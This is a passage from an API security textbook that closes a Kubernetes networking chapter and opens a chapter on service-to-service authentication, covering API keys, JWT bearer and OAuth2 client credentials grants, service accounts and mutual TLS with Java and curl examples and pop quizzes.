$ curl https://api.natter.local/users \
-H 'Content-Type: application/json' \
-d '{"username":"abcde","password":"password"}'
{"username":"abcde"}
If you check the status of requests using Linkerd’s tap utility, you’ll see that requests
from the ingress controller are protected with mTLS:
$ linkerd tap ns/natter-api
req id=4:2 proxy=in src=172.17.0.16:43358 dst=172.17.0.14:4567
➥ tls=true :method=POST :authority=natter-api-service.natter-
➥ api.svc.cluster.local:4567 :path=/users
rsp id=4:2 proxy=in src=172.17.0.16:43358 dst=172.17.0.14:4567
➥ tls=true :status=201 latency=322728µs
You now have TLS from clients to the ingress controller and mTLS between the ingress
controller and backend services, and between all microservices on the backend.⁴

⁴ The exception is the H2 database as Linkerd can't automatically apply mTLS to this connection. This should be fixed in the 2.7 release of Linkerd.
TIP In a production system you can use cert-manager (https://docs.cert-manager.io/en/latest/) to automatically obtain certificates from a public CA such as Let's Encrypt or from a private organizational CA such as Hashicorp Vault.
Pop quiz

7 Which of the following tasks are typically performed by an ingress controller?
  a Rate-limiting
  b Audit logging
  c Load balancing
  d Terminating TLS requests
  e Implementing business logic
  f Securing database connections

The answer is at the end of the chapter.

Answers to pop quiz questions

1 c. Pods are made up of one or more containers.
2 False. A sidecar container runs alongside the main container. An init container is the name for a container that runs before the main container.
3 a, b, c, d, and f are all good ways to improve the security of containers.
4 e. You should prefer strict allowlisting of URLs whenever possible.
5 d and e. Keeping the root CA key offline reduces the risk of compromise and allows you to revoke and rotate intermediate CA keys without rebuilding the whole cluster.
6 True. A service mesh can automatically handle most aspects of applying TLS to your network requests.
7 a, b, c, and d.
Summary

- Kubernetes is a popular way to manage a collection of microservices running on a shared cluster. Microservices are deployed as pods, which are groups of related Linux containers. Pods are scheduled across nodes, which are physical or virtual machines that make up the cluster. A service is implemented by one or more pod replicas.
- A security context can be applied to pod deployments to ensure that the container runs as a non-root user with limited privileges. A pod security policy can be applied to the cluster to enforce that no container is allowed elevated privileges.
- When an API makes network requests to a URL provided by a user, you should ensure that you validate the URL to prevent SSRF attacks. Strict allowlisting of permitted URLs should be preferred to blocklisting. Ensure that redirects are
also validated. Protect your APIs from DNS rebinding attacks by strictly validating the Host header and enabling TLS.
- Enabling TLS for all internal service communications protects against a variety of attacks and limits the damage if an attacker breaches your network. A service mesh such as Linkerd or Istio can be used to automatically manage mTLS connections between all services.
- Kubernetes network policies can be used to lock down allowed network communications, making it harder for an attacker to perform lateral movement inside your network. Istio authorization policies can perform the same task based on service identities and may be easier to configure.
- A Kubernetes ingress controller can be used to allow connections from external clients and apply consistent TLS and rate-limiting options. By adding the ingress controller to the service mesh you can ensure connections from the ingress to backend services are also protected with mTLS.
Securing service-to-service APIs
This chapter covers
- Authenticating services with API keys and JWTs
- Using OAuth2 for authorizing service-to-service API calls
- TLS client certificate authentication and mutual TLS
- Credential and key management for services
- Making service calls in response to user requests
In previous chapters, authentication has been used to determine which user is
accessing an API and what they can do. It’s increasingly common for services to talk
to other services without a user being involved at all. These service-to-service API
calls can occur within a single organization, such as between microservices, or
between organizations when an API is exposed to allow other businesses to access
data or services. For example, an online retailer might provide an API for resellers
to search products and place orders on behalf of customers. In both cases, it is the
API client that needs to be authenticated rather than an end user. Sometimes this is
needed for billing or to apply limits according to a service contract, but it’s also
essential for security when sensitive data or operations may be performed. Services
are often granted wider access than individual users, so stronger protections may
be required because the damage from compromise of a service account can be greater than any individual user account. In this chapter, you’ll learn how to authenticate services and additional hardening that can be applied to better protect privileged accounts, using advanced features of OAuth2.
NOTE The examples in this chapter require a running Kubernetes installation configured according to the instructions in appendix B.
11.1 API keys and JWT bearer authentication
One of the most common forms of service authentication is an API key, which is a simple bearer token that identifies the service client. An API key is very similar to the tokens you’ve used for user authentication in previous chapters, except that an API key identifies a service or business rather than a user and usually has a long expiry time. Typically, a user logs in to a website (known as a developer portal) and generates an API key that they can then add to their production environment to authenticate API calls, as shown in figure 11.1.
Figure 11.1 To gain access to an API, a representative of the organization logs into a developer portal and requests an API key. The portal generates the API key and returns it. The developer then includes the API key as a query parameter on requests to the API.
Section 11.5 covers techniques for securely deploying API keys and other credentials.
The API key is added to each request as a request parameter or custom header.
DEFINITION An API key is a token that identifies a service client rather than a user. API keys are typically valid for a much longer time than a user token, often months or years.
Any of the token formats discussed in chapters 5 and 6 are suitable for generating API keys, with the username replaced by an identifier for the service or business that API usage should be associated with and the expiry time set to a few months or years in the future. Permissions or scopes can be used to restrict which API calls can be made by which clients, and the resources they can read or modify, just as you’ve done for users in previous chapters; the same techniques apply.
An increasingly common choice is to replace ad hoc API key formats with standard JSON Web Tokens. In this case, the JWT is generated by the developer portal with claims describing the client and expiry time, and then either signed or encrypted with one of the symmetric authenticated encryption schemes described in chapter 6. This is known as JWT bearer authentication, because the JWT is acting as a pure bearer token: any client in possession of the JWT can use it to access the APIs it is valid for without presenting any other credentials. The JWT is usually passed to the API in the Authorization header using the standard Bearer scheme described in chapter 5.
DEFINITION In JWT bearer authentication, a client gains access to an API by presenting a JWT that has been signed by an issuer that the API trusts.
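For example, a client might attach such a JWT to a request using the standard Bearer scheme. The following is a minimal sketch using Java’s built-in HTTP client; the API URL and the jwtApiKey value are placeholder assumptions, not part of any real API, and it assumes the java.net.http imports shown later in listing 11.1:

var jwtApiKey = "<signed JWT from the developer portal>";     // placeholder value
var request = HttpRequest.newBuilder()
        .uri(URI.create("https://api.example.com/accounts"))  // hypothetical API endpoint
        .header("Authorization", "Bearer " + jwtApiKey)       // standard Bearer scheme
        .GET()
        .build();
var response = HttpClient.newHttpClient()
        .send(request, HttpResponse.BodyHandlers.ofString());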
An advantage of JWTs over simple database tokens or encrypted strings is that you can
use public key signatures to allow a single developer portal to generate tokens that
are accepted by many different APIs. Only the developer portal needs to have access
to the private key used to sign the JWTs, while each API server only needs access to
the public key. Using public key signed JWTs in this way is covered in section 7.4.4,
and the same approach can be used here, with a developer portal taking the place of
the AS.
WARNING Although using JWTs for client authentication is more secure than client secrets, a signed JWT is still a bearer credential that can be used by anyone that captures it until it expires. A malicious or compromised API server could take the JWT and replay it to other APIs to impersonate the client. Use expiry, audience, and other standard JWT claims (chapter 6) to reduce the impact if a JWT is compromised.
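On the receiving side, the API should check these claims before trusting the JWT. The following is a hedged sketch of the basic checks using the Nimbus library; the audience value is an assumption, and a real deployment must also verify the signature as described in chapter 7:

var jwt = SignedJWT.parse(apiKey);        // apiKey holds the received JWT string
var claims = jwt.getJWTClaimsSet();
if (claims.getExpirationTime() == null ||
        claims.getExpirationTime().before(new Date())) {
    throw new JOSEException("expired API key");
}
if (!claims.getAudience().contains("https://api.example.com")) {  // assumed audience
    throw new JOSEException("API key not intended for this API");
}
// Signature verification against the portal's public key must still be performed.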
11.2 The OAuth2 client credentials grant
Although JWT bearer authentication is appealing due to its apparent simplicity, you
still need to develop the portal for generating JWTs, and you’ll need to consider how
to revoke tokens when a service is retired or a business partnership is terminated. The
need to handle service-to-service API clients was anticipated by the authors of the
OAuth2 specifications, and a dedicated grant type was added to support this case: the client credentials grant. This grant type allows an OAuth2 client to obtain an access token using its own credentials without a user being involved at all. The access token issued by the authorization server (AS) can be used just like any other access token, allowing an existing OAuth2 deployment to be reused for service-to-service API calls. This allows the AS to be used as the developer portal and all the features of OAuth2, such as discoverable token revocation and introspection endpoints discussed in chapter 7, to be used for service calls.
WARNING If an API accepts calls from both end users and service clients, it’s important to make sure that the API can tell which is which. Otherwise, users may be able to impersonate service clients or vice versa. The OAuth2 standards don’t define a single way to distinguish these two cases, so you should consult the documentation for your AS vendor.
To obtain an access token using the client credentials grant, the client makes a direct
HTTPS request to the token endpoint of the AS, specifying the client_credentials
grant type and the scopes that it requires. The client authenticates itself using its own
credentials. OAuth2 supports a range of different client authentication mechanisms,
and you’ll learn about several of them in this chapter. The simplest authentication
method is known as client_secret_basic, in which the client presents its client ID
and a secret value using HTTP Basic authentication.1 For example, the following curl
command shows how to use the client credentials grant to obtain an access token for a
client with the ID test and secret value password:
$ curl -u test:password \
-d 'grant_type=client_credentials&scope=a+b+c' \
https://as.example.com/access_token
Assuming the credentials are correct, and the client is authorized to obtain access tokens using this grant and the requested scopes, the response will be like the following:

{
  "access_token": "q4TNVUHUe9A9MilKIxZOCIs6fI0",
  "scope": "a b c",
  "token_type": "Bearer",
  "expires_in": 3599
}
NOTE OAuth2 client secrets are not passwords intended to be remembered by users. They are usually long random strings of high entropy that are generated automatically during client registration.
1 OAuth2 Basic authentication requires additional URL-encoding if the client ID or secret contain non-ASCII
characters. See https://tools.ietf.org/html/rfc6749#section-2.3.1 for details.
The access token can then be used to access APIs just like any other OAuth2 access token discussed in chapter 7. The API validates the access token in the same way that it would validate any other access token, either by calling a token introspection endpoint or directly validating the token if it is a JWT or other self-contained format.
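For example, an API might validate the token by calling the AS introspection endpoint (RFC 7662). This is a hedged sketch only: the AS URL and the API’s own credentials are assumptions, error handling is omitted, and it assumes imports of java.util.Base64, java.net.URLEncoder, and java.nio.charset.StandardCharsets.UTF_8 in addition to the java.net.http classes:

var introspectRequest = HttpRequest.newBuilder()
        .uri(URI.create("https://as.example.com/introspect"))     // assumed AS endpoint
        .header("Content-Type", "application/x-www-form-urlencoded")
        .header("Authorization", "Basic " + Base64.getEncoder()
                .encodeToString("apiClient:apiSecret".getBytes(UTF_8)))  // assumed credentials
        .POST(HttpRequest.BodyPublishers.ofString(
                "token=" + URLEncoder.encode(accessToken, UTF_8)))       // the token to check
        .build();
var introspectResponse = HttpClient.newHttpClient()
        .send(introspectRequest, HttpResponse.BodyHandlers.ofString());
// The JSON response contains an "active" field: true if the token is valid.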
TIP
The OAuth2 spec advises AS implementations not to issue a refresh
token when using the client credentials grant. This is because there is little
point in the client using a refresh token when it can obtain a new access token
by using the client credentials grant again.
11.2.1 Service accounts
As discussed in chapter 8, user accounts are often held in an LDAP directory or other central database, allowing APIs to look up users and determine their roles and permissions. This is usually not the case for OAuth2 clients, which are often stored in an AS-specific database as in figure 11.2. A consequence of this is that the API can validate the access token but then has no further information about who the client is to make access control decisions.
One solution to this problem is for the API to make access control decisions purely
based on the scope or other information related to the access token itself. In this case,
access tokens act more like the capability tokens discussed in chapter 9, where the
token grants access to resources on its own and the identity of the client is ignored. Fine-grained scopes can be used to limit the amount of access granted.

Figure 11.2 An authorization server (AS) typically stores client details in a private database, so these details are not accessible to APIs. A service account lives in the shared user repository, allowing APIs to look up identity details such as role or group membership.
Alternatively, the client can avoid the client credentials grant and instead obtain an
access token for a service account. A service account acts like a regular user account and
is created in a central directory and assigned permissions and roles just like any other
account. This allows APIs to treat an access token issued for a service account the
same as an access token issued for any other user, simplifying access control. It also
allows administrators to use the same tools to manage service accounts that they use to
manage user accounts. Unlike a user account, the password or other credentials for a
service account should be randomly generated and of high entropy, because they
don’t need to be remembered by a human.
DEFINITION
A service account is an account that identifies a service rather
than a real user. Service accounts can simplify access control and account
management because they can be managed with the same tools you use to
manage users.
In a normal OAuth2 flow, such as the authorization code grant, the user’s web browser is redirected to a page on the AS to login and consent to the authorization request. For a service account, the client instead uses a non-interactive grant type that allows it to submit the service account credentials directly to the token endpoint. The client must have access to the service account credentials, so there is usually a service account dedicated to each client. The simplest grant type to use is the Resource Owner Password Credentials (ROPC) grant type, in which the service account username and password are sent to the token endpoint as form fields:
$ curl -u test:password \
-d 'grant_type=password&scope=a+b+c' \
-d 'username=serviceA&password=password' \
https://as.example.com/access_token
This will result in an access token being issued to the test client with the service
account serviceA as the resource owner.
WARNING Although the ROPC grant type is more secure for service accounts than for end users, there are better authentication methods available for service clients discussed in sections 11.3 and 11.4. The ROPC grant type may be deprecated or removed in future versions of OAuth.
The main downside of service accounts is the requirement for the client to manage
two sets of credentials, one as an OAuth2 client and one for the service account.
This can be eliminated by arranging for the same credentials to be used for both.
Alternatively, if the client doesn’t need to use features of the AS that require client
credentials, it can be a public client and use only the service account credentials
for access.
Pop quiz

1 Which of the following are differences between an API key and a user authentication token?
   a  API keys are more secure than user tokens.
   b  API keys can only be used during normal business hours.
   c  A user token is typically more privileged than an API key.
   d  An API key identifies a service or business rather than a user.
   e  An API key typically has a longer expiry time than a user token.

2 Which one of the following grant types is most easily used for authenticating a service account?
   a  PKCE
   b  Hugh Grant
   c  Implicit grant
   d  Authorization code grant
   e  Resource owner password credentials grant

The answers are at the end of the chapter.
11.3 The JWT bearer grant for OAuth2
NOTE
To run the examples in this section, you’ll need a running OAuth2
authorization server. Follow the instructions in appendix A to configure the
AS and a test client before continuing with this section.
Authentication with a client secret or service account password is very simple, but suffers from several drawbacks:

- Some features of OAuth2 and OIDC require the AS to be able to access the raw bytes of the client secret, preventing the use of hashing. This increases the risk if the client database is ever compromised as an attacker may be able to recover all the client secrets.
- If communications to the AS are compromised, then an attacker can steal client secrets as they are transmitted. In section 11.4.6, you’ll see how to harden access tokens against this possibility, but client secrets are inherently vulnerable to being stolen.
- It can be difficult to change a client secret or service account password, especially if it is shared by many servers.
For these reasons, it’s beneficial to use an alternative authentication mechanism. One alternative supported by many authorization servers is the JWT Bearer grant type for OAuth2, defined in RFC 7523 (https://tools.ietf.org/html/rfc7523). This specification allows a client to obtain an access token by presenting a JWT signed by a trusted party, either to authenticate itself for the client credentials grant, or to exchange a
JWT representing authorization from a user or service account. In the first case, the JWT is signed by the client itself using a key that it controls. In the second case, the JWT is signed by some authority that is trusted by the AS, such as an external OIDC provider. This can be useful if the AS wants to delegate user authentication and consent to a third-party service. For service account authentication, the client is often directly trusted with the keys to sign JWTs on behalf of that service account because there is a dedicated service account for each client. In section 11.5.3, you’ll see how separating the duties of the client from the service account authentication can add an extra layer of security.
By using a public key signature algorithm, the client needs to supply only the public key to the AS, reducing the risk if the AS is ever compromised because the public key can only be used to verify signatures and not create them. Adding a short expiry time also reduces the risks when authenticating over an insecure channel, and some servers support remembering previously used JWT IDs to prevent replay.
Another advantage of JWT bearer authentication is that many authorization servers support fetching the client’s public keys in JWK format from an HTTPS endpoint. The AS will periodically fetch the latest keys from the endpoint, allowing the client to change their keys regularly. This effectively bootstraps trust in the client’s public keys using the web PKI: the AS trusts the keys because they were loaded from a URI that the client specified during registration and the connection was authenticated using TLS, preventing an attacker from injecting fake keys. The JWK Set format allows the client to supply more than one key, allowing it to keep using the old signature key until it is sure that the AS has picked up the new one (figure 11.3).
Figure 11.3 The client publishes its public key to a URI it controls and registers this URI with the AS. When the client authenticates, the AS will retrieve its public key over HTTPS from the registered URI. The client can publish a new public key whenever it wants to change the key.
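A minimal sketch of what publishing both keys during a rotation might look like with the Nimbus library; the second keystore alias es256-key-new is an assumption standing in for wherever you store the replacement key:

var rotatingJwkSet = new JWKSet(List.of(
        ECKey.load(keyStore, "es256-key", password),      // current signing key
        ECKey.load(keyStore, "es256-key-new", password)   // replacement key being rolled in
)).toPublicJWKSet();        // strip private material before publishing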
11.3.1 Client authentication
To obtain an access token under its own authority, a client can use JWT bearer client authentication with the client credentials grant. The client performs the same request as you did in section 11.2, but rather than supplying a client secret using Basic authentication, you instead supply a JWT signed with the client’s private key. When used for authentication, the JWT is also known as a client assertion.

DEFINITION An assertion is a signed set of identity claims used for authentication or authorization.
To generate the public and private key pair to use to sign the JWT, you can use keytool from the command line, as follows. Keytool will generate a certificate for TLS when generating a public key pair, so use the -dname option to specify the subject name. This is required even though you won’t use the certificate. You’ll be prompted for the keystore password.
keytool -genkeypair \
    -keystore keystore.p12 \
    -keyalg EC -keysize 256 -alias es256-key \
    -dname cn=test
TIP Keytool picks an appropriate elliptic curve based on the key size, and in this case happens to pick the correct P-256 curve required for the ES256 algorithm. There are other 256-bit elliptic curves that are incompatible. In Java 12 and later you can use the -groupname secp256r1 argument to explicitly specify the correct curve. For ES384 the group name is secp384r1 and for ES512 it is secp521r1 (note: 521 not 512). Keytool can’t generate EdDSA keys at this time.
You can then load the private key from the keystore in the same way that you did in chapters 5 and 6 for the HMAC and AES keys. The JWT library requires that the key is cast to the specific ECPrivateKey type, so do that when you load it. Listing 11.1 shows the start of a JwtBearerClient class that you’ll write to implement JWT bearer authentication. Navigate to src/main/java/com/manning/apisecurityinaction and create a new file named JwtBearerClient.java. Type in the contents of the listing and save the file. It doesn’t do much yet, but you’ll expand it next. The listing contains all the import statements you’ll need to complete the class.
Listing 11.1 Loading the private key
package com.manning.apisecurityinaction;
import java.io.FileInputStream;
import java.net.URI;
import java.net.http.*;
import java.security.KeyStore;
import java.security.interfaces.ECPrivateKey;
import java.util.*;
import com.nimbusds.jose.*;
import com.nimbusds.jose.crypto.ECDSASigner;
import com.nimbusds.jose.jwk.*;
import com.nimbusds.jwt.*;
import static java.time.Instant.now;
import static java.time.temporal.ChronoUnit.SECONDS;
import static spark.Spark.*;
public class JwtBearerClient {
    public static void main(String... args) throws Exception {
        var password = "changeit".toCharArray();
        var keyStore = KeyStore.getInstance("PKCS12");
        keyStore.load(new FileInputStream("keystore.p12"),
                password);
        var privateKey = (ECPrivateKey)                   // Cast the private key
                keyStore.getKey("es256-key", password);   //   to the required type.
    }
}
For the AS to be able to validate the signed JWT you send, it needs to know where to find the public key for your client. As discussed in the introduction to section 11.3, a flexible way to do this is to publish your public key as a JWK Set because this allows you to change your key regularly by simply publishing a new key to the JWK Set. The Nimbus JOSE+JWT library that you used in chapter 5 supports generating a JWK Set from a keystore using the JWKSet.load method, as shown in listing 11.2. After loading the JWK Set, use the toPublicJWKSet method to ensure that it only contains public key details and not the private keys. You can then use Spark to publish the JWK Set at an HTTPS URI using the standard application/jwk-set+json content type. Make sure that you turn on TLS support using the secure method so that the keys can’t be tampered with in transit, as discussed in chapter 3. Open the JwtBearerClient.java file again and add the code from the listing to the main method, after the existing code.
WARNING
Make sure you don’t forget the .toPublicJWKSet() method call.
Otherwise you’ll publish your private keys to the internet!
Listing 11.2 Publishing a JWK Set

var jwkSet = JWKSet.load(keyStore, alias -> password)   // Load the JWK Set from the keystore.
        .toPublicJWKSet();                              // Ensure it contains only public keys.
secure("localhost.p12", "changeit", null, null);
get("/jwks", (request, response) -> {                   // Publish the JWK Set to an HTTPS
    response.type("application/jwk-set+json");          //   endpoint using Spark.
    return jwkSet.toString();
});
The Nimbus JOSE library requires the Bouncy Castle cryptographic library to be
loaded to enable JWK Set support, so add the following dependency to the Maven
pom.xml file in the root of the Natter API project:
<dependency>
    <groupId>org.bouncycastle</groupId>
    <artifactId>bcpkix-jdk15on</artifactId>
    <version>1.66</version>
</dependency>
You can now start the client by running the following command in the root folder of
the Natter API project:
mvn clean compile exec:java \
-Dexec.mainClass=com.manning.apisecurityinaction.JwtBearerClient
In a separate terminal, you can then test that the public keys are being published by
running:
curl https://localhost:4567/jwks > jwks.txt
The result will be a JSON object containing a single keys field, which is an array of
JSON Web Keys.
By default, the AS server running in Docker won’t be able to access the URI that
you’ve published the keys to, so for this example you can copy the JWK Set directly
into the client settings. If you’re using the ForgeRock Access Management software
from appendix A, then log in to the admin console as amadmin as described in the
appendix and carry out the following steps:
1. Navigate to the Top Level Realm and click on Applications in the left-hand menu and then OAuth2.0.
2. Click on the test client you registered when installing the AS.
3. Select the Signing and Encryption tab, and then copy and paste the contents of the jwks.txt file you just saved into the Json Web Key field.
4. Find the Token Endpoint Authentication Signing Algorithm field just above the JWK field and change it to ES256.
5. Change the Public Key Selector field to “JWKs” to ensure the keys you just configured are used.
6. Finally, scroll down and click Save Changes at the lower right of the screen.
11.3.2 Generating the JWT
A JWT used for client authentication must contain the following claims:

- The sub claim is the ID of the client.
- An iss claim that indicates who signed the JWT. For client authentication this is also usually the client ID.
- An aud claim that lists the URI of the token endpoint of the AS as the intended audience.
- An exp claim that limits the expiry time of the JWT. An AS may reject a client authentication JWT with an unreasonably long expiry time to reduce the risk of replay attacks.
Some authorization servers also require the JWT to contain a jti claim with a unique random value in it. The AS can remember the jti value until the JWT expires to prevent replay if the JWT is intercepted. This is very unlikely because client authentication occurs over a direct TLS connection between the client and the AS, but the use of a jti is required by the OpenID Connect specifications, so you should add one to ensure maximum compatibility. Listing 11.3 shows how to generate a JWT in the correct format using the Nimbus JOSE+JWT library that you used in chapter 6. In this case, you’ll use the ES256 signature algorithm (ECDSA with SHA-256), which is widely implemented. Generate a JWT header indicating the algorithm and the key ID (which corresponds to the keystore alias). Populate the JWT claims set values as just discussed. Finally, sign the JWT to produce the assertion value. Open the JwtBearerClient.java file and type in the contents of the listing at the end of the main method.
Listing 11.3 Generating a JWT client assertion

var clientId = "test";
var as = "https://as.example.com:8080/oauth2/access_token";
var header = new JWSHeader.Builder(JWSAlgorithm.ES256)   // Create a header with the correct
        .keyID("es256-key")                              //   algorithm and key ID.
        .build();
var claims = new JWTClaimsSet.Builder()
        .subject(clientId)                                   // Set the subject and issuer
        .issuer(clientId)                                    //   claims to the client ID.
        .expirationTime(Date.from(now().plus(30, SECONDS)))  // Add a short expiration time.
        .audience(as)                                        // Set the audience to the AS token endpoint.
        .jwtID(UUID.randomUUID().toString())                 // Add a random JWT ID claim to prevent replay.
        .build();
var jwt = new SignedJWT(header, claims);
jwt.sign(new ECDSASigner(privateKey));                       // Sign the JWT with the private key.
var assertion = jwt.serialize();
Once you’ve registered the JWK Set with the AS, you should then be able to generate an assertion and use it to authenticate to the AS to obtain an access token. Listing 11.4 shows how to format the client credentials request with the client assertion and send it to the AS in an HTTP request. The JWT assertion is passed as a new client_assertion parameter, and the client_assertion_type parameter is used to indicate that the assertion is a JWT by specifying the value:

urn:ietf:params:oauth:client-assertion-type:jwt-bearer
The encoded form parameters are then POSTed to the AS token endpoint using the
Java HTTP library. Open the JwtBearerClient.java file again and add the contents of
the listing to the end of the main method.
Listing 11.4 Sending the request to the AS

var form = "grant_type=client_credentials&scope=create_space" +   // Build the form content
        "&client_assertion_type=" +                               //   with the assertion JWT.
        "urn:ietf:params:oauth:client-assertion-type:jwt-bearer" +
        "&client_assertion=" + assertion;
var httpClient = HttpClient.newHttpClient();
var request = HttpRequest.newBuilder()                            // Create the POST request
        .uri(URI.create(as))                                      //   to the token endpoint.
        .header("Content-Type", "application/x-www-form-urlencoded")
        .POST(HttpRequest.BodyPublishers.ofString(form))
        .build();
var response = httpClient.send(request,                           // Send the request and
        HttpResponse.BodyHandlers.ofString());                    //   parse the response.
System.out.println(response.statusCode());
System.out.println(response.body());
Run the following Maven command to test out the client and receive an access token
from the AS:
mvn -q clean compile exec:java \
-Dexec.mainClass=com.manning.apisecurityinaction.JwtBearerClient
After the client flow completes, it will print out the access token response from the AS.
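If you want to use the token programmatically rather than just printing it, you can pull it out of the JSON body. A small sketch, assuming the org.json library used elsewhere in the Natter API is on the classpath:

var json = new org.json.JSONObject(response.body());
var accessToken = json.getString("access_token");     // use this as a Bearer token
System.out.println("Token expires in " + json.getInt("expires_in") + " seconds");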
11.3.3 Service account authentication
Authenticating a service account using JWT bearer authentication works a lot like client
authentication. Rather than using the client credentials grant, a new grant type named
urn:ietf:params:oauth:grant-type:jwt-bearer
is used, and the JWT is sent as the value of the assertion parameter rather than the
client_assertion parameter. The following code snippet shows how to construct the
form when using the JWT bearer grant type to authenticate using a service account:
var form = "grant_type=" +
        "urn:ietf:params:oauth:grant-type:jwt-bearer" +    // Use the jwt-bearer grant type.
        "&scope=create_space&assertion=" + assertion;      // Pass the JWT as the assertion parameter.
The claims in the JWT are the same as those used for client authentication, with the following exceptions:

- The sub claim should be the username of the service account rather than the client ID.
- The iss claim may also be different from the client ID, depending on how the AS is configured.
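Putting this together, the claims set from listing 11.3 might change as follows for a service account. This is a sketch assuming a service account named serviceA; check how your AS expects the issuer to be set:

var claims = new JWTClaimsSet.Builder()
        .subject("serviceA")    // the service account username, not the client ID
        .issuer(clientId)       // may differ, depending on AS configuration
        .expirationTime(Date.from(now().plus(30, SECONDS)))
        .audience(as)
        .jwtID(UUID.randomUUID().toString())
        .build();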
There is an important difference in the security properties of the two methods, and this is often reflected in how the AS is configured. When the client is using a JWT to authenticate itself, the JWT is a self-assertion of identity. If the authentication is successful, then the AS issues an access token authorized by the client itself. In the JWT bearer grant, the client is asserting that it is authorized to receive an access token on behalf of the given user, which may be a service account or a real user. Because the user is not present to consent to this authorization, the AS will usually enforce stronger security checks before issuing the access token. Otherwise, a client could ask for access tokens for any user it liked without the user being involved at all. For example, an AS might require separate registration of trusted JWT issuers with settings to limit which users and scopes they can authorize access tokens for.
An interesting aspect of JWT bearer authentication is that the issuer of the JWT and the client can be different parties. You’ll use this capability in section 11.5.3 to harden the security of a service environment by ensuring that pods running in Kubernetes don’t have direct access to privileged service credentials.
Pop quiz

3 Which one of the following is the primary reason for preferring a service account over the client credentials grant?
   a  Client credentials are more likely to be compromised.
   b  It’s hard to limit the scope of a client credentials grant request.
   c  It’s harder to revoke client credentials if the account is compromised.
   d  The client credentials grant uses weaker authentication than service accounts.
   e  Clients are usually private to the AS while service accounts can live in a shared repository.

4 Which of the following are reasons to prefer JWT bearer authentication over client secret authentication? (There may be multiple correct answers.)
   a  JWTs are simpler than client secrets.
   b  JWTs can be compressed and so are smaller than client secrets.
   c  The AS may need to store the client secret in a recoverable form.
   d  A JWT can have a limited expiry time, reducing the risk if it is stolen.
   e  JWT bearer authentication avoids sending a long-lived secret over the network.

The answers are at the end of the chapter.
11.4 Mutual TLS authentication
JWT bearer authentication is more secure than sending a client secret to the AS, but
as you’ve seen in section 11.3.1, it can be significantly more complicated for the client.
OAuth2 requires that connections to the AS are made using TLS, and you can use
TLS for secure client authentication as well. In a normal TLS connection, only the
server presents a certificate that authenticates who it is. As explained in chapter 10,
this is all that is required to set up a secure channel as the client connects to the server, and the client needs to be assured that it has connected to the right server and not a malicious fake. But TLS also allows the client to optionally authenticate with a client certificate, allowing the server to be assured of the identity of the client and use this for access control decisions. You can use this capability to provide secure authentication of service clients. When both sides of the connection authenticate, this is known as mutual TLS (mTLS).
TIP Although it was once hoped that client certificate authentication would be used for users, perhaps even replacing passwords, it is very seldom used. The complexity of managing keys and certificates makes the user experience very poor and confusing. Modern user authentication methods such as WebAuthn (https://webauthn.guide) provide many of the same security benefits and are much easier to use.
11.4.1 How TLS certificate authentication works
The full details of how TLS certificate authentication works would take many chapters on its own, but a sketch of how the process works in the most common case will help you to understand the security properties provided. TLS communication is split into two phases:

1. An initial handshake, in which the client and the server negotiate which cryptographic algorithms and protocol extensions to use, optionally authenticate each other, and agree on shared session keys.
2. An application data transmission phase in which the client and server use the shared session keys negotiated during the handshake to exchange data using symmetric authenticated encryption.2
During the handshake, the server presents its own certificate in a TLS Certificate message. Usually this is not a single certificate, but a certificate chain, as described in chapter 10: the server’s certificate is signed by a certificate authority (CA), and the CA’s certificate is included too. The CA may be an intermediate CA, in which case another CA also signs its certificate, and so on until at the end of the chain is a root CA that is directly trusted by the client. The root CA certificate is usually not sent as part of the chain as the client already has a copy.

RECAP A certificate contains a public key and identity information of the subject the certificate was issued to and is signed by a certificate authority. A certificate chain consists of the server or client certificate followed by the certificates of one or more CAs. Each certificate is signed by the CA following it in the chain until a root CA is reached that is directly trusted by the recipient.
2 There are additional sub-protocols that are used to change algorithms or keys after the initial handshake and to signal alerts, but you don’t need to understand these.
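To make the chain-verification step concrete, here is a hedged sketch of validating a certificate chain in Java with the PKIX algorithm. The clientCert, intermediateCaCert, and rootCaCert variables are assumptions standing in for certificates you have already loaded (imports from java.security.cert.* and java.util.*); TLS implementations perform an equivalent check internally during the handshake:

var certFactory = CertificateFactory.getInstance("X.509");
var certPath = certFactory.generateCertPath(
        List.of(clientCert, intermediateCaCert));   // leaf certificate first, then intermediates
var trustAnchors = Set.of(new TrustAnchor(rootCaCert, null));
var params = new PKIXParameters(trustAnchors);
params.setRevocationEnabled(false);                 // enable revocation checking in production
CertPathValidator.getInstance("PKIX")
        .validate(certPath, params);                // throws an exception if the chain is invalid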
To enable client certificate authentication, the server sends a CertificateRequest message, which requests that the client also present a certificate, and optionally indicates which CAs it is willing to accept certificates signed by and the signature algorithms it supports. If the server doesn’t send this message, then client certificate authentication is disabled. The client then responds with its own Certificate message containing its certificate chain. The client can also ignore the certificate request, and the server can then choose whether to accept the connection or not.

NOTE The description in this section is of the TLS 1.3 handshake (simplified). Earlier versions of the protocol use different messages, but the process is equivalent.
If this was all that was involved in TLS certificate authentication, it would be no different to JWT bearer authentication, and the server could take the client’s certificates and present them to other servers to impersonate the client, or vice versa. To prevent this, whenever the client or server presents a Certificate message TLS requires them to also send a CertificateVerify message in which they sign a transcript of all previous messages exchanged during the handshake. This proves that the client (or server) has control of the private key corresponding to their certificate and ensures that the signature is tightly bound to this specific handshake: there are unique values exchanged in the handshake, preventing the signature being reused for any other TLS session. The session keys used for authenticated encryption after the handshake are also derived from these unique values, ensuring that this one signature during the handshake effectively authenticates the entire session, no matter how much data is exchanged. Figure 11.4 shows the main messages exchanged in the TLS 1.3 handshake.
LEARN ABOUT IT We’ve only given a brief sketch of the TLS handshake process and certificate authentication. An excellent resource for learning more is Bulletproof SSL and TLS by Ivan Ristić (Feisty Duck, 2015).
Figure 11.4 In the TLS handshake, the server sends its own certificate and can ask the client for a certificate using a CertificateRequest message. The client responds with a Certificate message containing the certificate and a CertificateVerify message proving that it owns the associated private key.
Pop quiz

5 To request client certificate authentication, the server must send which one of the following messages?
   a  Certificate
   b  ClientHello
   c  ServerHello
   d  CertificateVerify
   e  CertificateRequest

6 How does TLS prevent a captured CertificateVerify message being reused for a different TLS session? (Choose one answer.)
   a  The client’s word is their honor.
   b  The CertificateVerify message has a short expiry time.
   c  The CertificateVerify contains a signature over all previous messages in the handshake.
   d  The server and client remember all CertificateVerify messages they’ve ever seen.

The answers are at the end of the chapter.
11.4.2 Client certificate authentication
To enable TLS client certificate authentication for service clients, you need to configure the server to send a CertificateRequest message as part of the handshake and to validate any certificate that it receives. Most application servers and reverse proxies
support configuration options for requesting and validating client certificates, but
these vary from product to product. In this section, you’ll configure the NGINX ingress
controller from chapter 10 to allow client certificates and verify that they are signed by
